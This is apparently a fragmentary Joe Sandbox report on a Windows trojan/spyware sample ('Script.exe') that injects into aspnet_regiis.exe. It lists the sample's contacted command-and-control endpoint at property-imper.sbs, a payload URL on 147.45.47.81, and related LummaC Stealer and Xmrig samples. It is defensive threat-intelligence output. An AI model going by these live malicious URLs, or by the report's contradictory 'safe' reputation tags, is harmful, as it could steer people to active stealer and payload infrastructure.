              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Script.exe29%VirustotalBrowse
              Script.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://property-imper.sbs/apic0%Avira URL Cloudsafe
              https://property-imper.sbs:443/apiicrosoft0%Avira URL Cloudsafe
              http://147.45.47.81:80/conhost.exeicrosoft0%Avira URL Cloudsafe
              http://147.45.47.81/0%Avira URL Cloudsafe
              http://147.45.47.81/conhost.exeR0%Avira URL Cloudsafe
              http://147.45.47.81/18%VirustotalBrowse
              http://147.45.47.81/conhost.exe0%Avira URL Cloudsafe
              https://property-imper.sbs/(0%Avira URL Cloudsafe
              https://property-imper.sbs/$0%Avira URL Cloudsafe
              https://property-imper.sbs/api;I0%Avira URL Cloudsafe
              http://147.45.47.81/v0%Avira URL Cloudsafe
              https://property-imper.sbs/b0%Avira URL Cloudsafe
              http://crl.microh0%Avira URL Cloudsafe
              https://property-imper.sbs:443/apiK0%Avira URL Cloudsafe
              https://property-imper.sbs/apiN0%Avira URL Cloudsafe
              https://property-imper.sbs/Z0%Avira URL Cloudsafe
              http://147.45.47.81/conhost.exet0%Avira URL Cloudsafe
              https://property-imper.sbs/apiZuV0%Avira URL Cloudsafe
              https://property-imper.sbs/R0%Avira URL Cloudsafe
              https://property-imper.sbs/pi0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              property-imper.sbs
              104.21.33.116
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://property-imper.sbs/apifalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://147.45.47.81:80/conhost.exeicrosoftaspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://property-imper.sbs/apicaspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://property-imper.sbs:443/apiicrosoftaspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://property-imper.sbs:443/apiaspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://147.45.47.81/aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 18%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://147.45.47.81/conhost.exeRaspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://upx.sf.netAmcache.hve.6.drfalse
                                    high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://147.45.47.81/conhost.exeaspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaaspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://property-imper.sbs/aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2524937110.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143157759.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://property-imper.sbs/(aspnet_regiis.exe, 00000003.00000003.2164739586.00000000051BE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164630592.00000000051B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164351137.00000000051B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgaspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://property-imper.sbs/$aspnet_regiis.exe, 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://property-imper.sbs/api;Iaspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://147.45.47.81/vaspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://property-imper.sbs/baspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgaspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://property-imper.sbs:443/apiKaspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://crl.microhaspnet_regiis.exe, 00000003.00000003.2278969823.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://x1.c.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.i.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://property-imper.sbs/apiNaspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://property-imper.sbs/Zaspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refaspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://147.45.47.81/conhost.exetaspnet_regiis.exe, 00000003.00000002.2525039530.0000000002EAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://property-imper.sbs/apiZuVaspnet_regiis.exe, 00000003.00000003.2252014610.00000000051D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523832590.00000000051D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2525465526.00000000051D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235406120.00000000051D5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2279021640.00000000051D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://property-imper.sbs/Raspnet_regiis.exe, 00000003.00000002.2524937110.0000000002E81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://property-imper.sbs/piaspnet_regiis.exe, 00000003.00000003.2251568762.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2252261385.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235233881.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235371345.0000000002EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.21.33.116
                                                                      property-imper.sbsUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      147.45.47.81
                                                                      unknownRussian Federation
                                                                      2895FREE-NET-ASFREEnetEUfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1561303
                                                                      Start date and time:2024-11-23 03:10:09 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 9s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Script.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/7@1/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 50%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 9
                                                                      • Number of non-executed functions: 51
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target aspnet_regiis.exe, PID 768 because there are no executed function
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      TimeTypeDescription
                                                                      21:11:07API Interceptor9x Sleep call for process: aspnet_regiis.exe modified
                                                                      21:11:34API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.21.33.116file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                https://trk.contentbasepro.com/director/global/Fw7NuShXblevjUFDSLZ8kQ==/fallback/?sl1=5ce983c7-d1b3-95c9-2cd6-495d0a377092&sl2=4MQMyhq6&sl3=opBRlAiH&sl4=qUjNxiIm&transaction_id=68bifqbz8u1x&aff_id=350046&aff_sub=735313144&rc=R-CT-P-SC&pl=679540491&pc_session_id=92lvvqhjp8p3uckfida1jav7q0-33841&sid=92lvvqhjp8p3uckfida1jav7q0-33841&pc_synd_id=shl_cbs_uk_a1_sh383_pp_2_cxf&partner=shl_cbs_uk_a1_sh383_pp_2_cxf&rr=timerGet hashmaliciousUnknownBrowse
                                                                                  147.45.47.81n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                  • 147.45.47.81/WinRing0x64.sys
                                                                                  PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                  • 147.45.47.81/WinRing0x64.sys
                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                  • 147.45.47.81/conhost.exe
                                                                                  Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 147.45.47.81/conhost.exe
                                                                                  inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                  • 147.45.47.81/conhost.exe
                                                                                  BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                  • 147.45.47.81/WinRing0x64.sys
                                                                                  CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                  • 147.45.47.81/WinRing0x64.sys
                                                                                  XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                  • 147.45.47.81/WinRing0x64.sys
                                                                                  n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                                                                  • 147.45.47.81/WinRing0x64.sys
                                                                                  lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                  • 147.45.47.81/xmrig.exe
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  property-imper.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 172.67.162.84
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSSolara.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.155.248
                                                                                  http://ppc-overwatch.comGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.248.203
                                                                                  Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                  • 104.26.1.231
                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                  • 172.64.41.3
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  Yssr_Receipt.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.25.14
                                                                                  Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                  • 104.26.0.231
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • 172.64.41.3
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  FREE-NET-ASFREEnetEUhttps://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 147.45.178.112
                                                                                  http://147.45.47.98/js/error.jsGet hashmaliciousUnknownBrowse
                                                                                  • 147.45.47.98
                                                                                  hmips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 193.233.193.45
                                                                                  ppc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 193.233.193.45
                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 193.233.193.45
                                                                                  x86.elfGet hashmaliciousUnknownBrowse
                                                                                  • 193.233.193.45
                                                                                  owari.mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 147.45.234.212
                                                                                  pdusf6w2SJ.exeGet hashmaliciousRedLineBrowse
                                                                                  • 147.45.44.221
                                                                                  ppc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 193.233.193.45
                                                                                  hmips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 193.233.193.45
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  a0e9f5d64349fb13191bc781f81f42e1Solara.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.33.116
                                                                                  No context
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):0.9841274532355747
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:zoFf5Fjn+5ALFHoHXwGMldvxmoijCQXIDcQvc6QcEVcw3cE/H+BHUHZ0ownOgHkF:EBjNHoKkd0BU/qaetizuiFzZ24IO8K
                                                                                  MD5:6678905D5EB0F8E35635FB6933FDC319
                                                                                  SHA1:88FBF51FDDA4A05A0D211EABFC2F2D52C11D20D8
                                                                                  SHA-256:B5F34D3E0EC3A1517C5E4B829C77B4D73CA423082BE72752D992D1E3654A7844
                                                                                  SHA-512:643B3785E42DAEAA36A7714BCED61D210C67272772B3A55FDF6B341AB7A81E820FE8AA1288201D9F8AE26FA386CF585E6F07777EB04EF45F1BBCC99B2B58256A
                                                                                  Malicious:true
                                                                                  Reputation:low
                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.0.1.4.6.5.8.0.0.7.4.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.0.1.4.6.6.4.8.8.2.5.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.b.7.3.3.d.4.-.3.6.7.8.-.4.1.e.0.-.8.5.f.8.-.8.3.f.b.a.e.c.7.7.4.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.e.6.6.3.0.f.-.7.3.a.3.-.4.2.5.b.-.9.4.a.4.-.8.4.5.5.6.0.1.8.6.c.1.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.c.r.i.p.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.N.a.t.h.a.n.E.l.e.a.n.o.r.B.e.n.j.a.m.i.n...h.D.w.Y.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.0.-.0.0.0.1.-.0.0.1.4.-.1.3.a.3.-.5.4.f.3.4.c.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.5.9.3.5.6.b.5.d.0.9.1.8.f.d.2.c.4.0.2.e.b.f.f.f.7.0.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 15 streams, Sat Nov 23 02:11:06 2024, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):201076
                                                                                  Entropy (8bit):3.335613011480351
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:zdJLGl2wpN4uE2aO0yLTgPIR2tqCD2KwTAHu8U:xS4uEqRLTgPe272Kms
                                                                                  MD5:B6D2C2BA8BD05EC7BE958B2AE516BAE4
